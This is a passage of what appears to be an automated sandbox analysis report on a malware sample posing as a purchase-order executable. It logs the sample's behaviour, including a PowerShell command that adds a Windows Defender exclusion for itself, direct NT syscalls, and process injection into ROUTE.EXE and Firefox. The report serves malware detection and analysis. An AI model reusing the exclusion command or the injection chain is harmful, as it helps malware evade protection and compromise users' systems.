                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA6C7 mov ebx, dword ptr fs:[00000030h]4_2_01BCA6C7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA6C7 mov eax, dword ptr fs:[00000030h]4_2_01BCA6C7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9262C mov eax, dword ptr fs:[00000030h]4_2_01B9262C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC6620 mov eax, dword ptr fs:[00000030h]4_2_01BC6620
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8620 mov eax, dword ptr fs:[00000030h]4_2_01BC8620
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE627 mov eax, dword ptr fs:[00000030h]4_2_01BAE627
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2619 mov eax, dword ptr fs:[00000030h]4_2_01BD2619
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h]4_2_01C5866E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h]4_2_01C5866E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC2674 mov eax, dword ptr fs:[00000030h]4_2_01BC2674
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E609 mov eax, dword ptr fs:[00000030h]4_2_01C0E609
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h]4_2_01BCA660
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h]4_2_01BCA660
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAC640 mov eax, dword ptr fs:[00000030h]4_2_01BAC640
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C269C0 mov eax, dword ptr fs:[00000030h]4_2_01C269C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h]4_2_01B909AD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h]4_2_01B909AD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5A9D3 mov eax, dword ptr fs:[00000030h]4_2_01C5A9D3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateKey: Direct from: 0x76F02C6C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationThread: Direct from: 0x76F02B4C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenSection: Direct from: 0x76F02E0C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationThread: Direct from: 0x76EF63F9
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateFile: Direct from: 0x76F02FEC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenFile: Direct from: 0x76F02DCC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtTerminateThread: Direct from: 0x76F02FCC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateMutant: Direct from: 0x76F035CC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtResumeThread: Direct from: 0x76F036AC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtReadFile: Direct from: 0x76F02ADC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtDelayExecution: Direct from: 0x76F02DDC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtResumeThread: Direct from: 0x76F02FBC
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateUserProcess: Direct from: 0x76F0371C
                      Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: read write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Thread register set: target process: 2892
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Thread APC queued: target process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                      Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Users\user\Desktop\PO -2025918.exe VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
